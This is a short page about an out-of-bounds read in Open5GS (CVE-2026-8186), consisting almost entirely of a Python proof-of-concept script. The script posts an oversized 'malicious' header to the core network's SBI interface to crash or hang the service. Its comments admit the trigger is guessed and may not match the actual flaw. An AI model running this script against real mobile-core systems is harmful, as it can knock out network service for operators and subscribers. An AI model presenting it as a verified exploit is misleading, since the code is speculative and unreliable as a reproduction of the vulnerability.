CVE-2026-8186 Open5GS越界读取漏洞

# PoC for CVE-2026-8186 (Conceptual) # This script attempts to trigger the out-of-bounds read in Open5GS # by sending a specially crafted request to the SBI interface. import requests import sys def trigger_vulnerability(target_ip, target_port=7777): url = f"http://{target_ip}:{target_port}/namf-comm/v1/ue-contexts" # Constructing a malformed payload that might trigger the OOB read # Specific boundary details depend on the commit diff, but large headers # or malformed JSON structures are common triggers. headers = { "User-Agent": "CVE-2026-8186-Test", "Content-Type": "application/json", "X-Malicious-Header": "A" * 10000 # Potential trigger for buffer handling issue } payload = { "supi": "imsi-999990000000001", "plmnId": { "mcc": "999", "mnc": "99" } } try: print(f"[*] Sending payload to {url}...") response = requests.post(url, json=payload, headers=headers, timeout=5) print(f"[+] Response Status: {response.status_code}") print("[!] If the service crashes or hangs, the vulnerability might be triggered.") except Exception as e: print(f"[!] Exception occurred: {e}") print("[!] Service might have crashed (Denial of Service).") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python poc.py <target_ip>") else: trigger_vulnerability(sys.argv[1])